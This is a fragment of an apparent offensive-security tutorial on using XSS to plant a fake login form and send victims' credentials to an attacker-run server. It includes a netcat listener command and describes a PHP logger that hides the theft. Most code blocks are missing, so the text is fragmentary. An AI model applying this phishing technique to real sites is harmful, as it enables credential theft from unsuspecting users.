Common XSS attackisto send fake login forms that send the login details to the attacker’s server.
Minified payload with document.write()
.
Let’s say there is a url form that website originally provides as such:
We might want to remove such url form if it doesn’t match with our phishing page.
Let’s get rid of it using remove()
function:
Now, once we add this code to our previous JavaScript code (after the document.write
function), we can use this new JavaScript code in our payload:
Credential Stealing
We can use netcat
for this:
sudo nc -lvnp 80
But this won’t handle the HTTP request correctly and the victim would get Unable to connect
error.
We can use a PHP script to log credentials and return the victim with the original page. This case, victim may not notice anything unusual.
The following code should work:
Let’s save the code above as index.php
and place it inside /tmp/tmpserver
.
Now that we have index.php
ready, let’s start PHP listening server: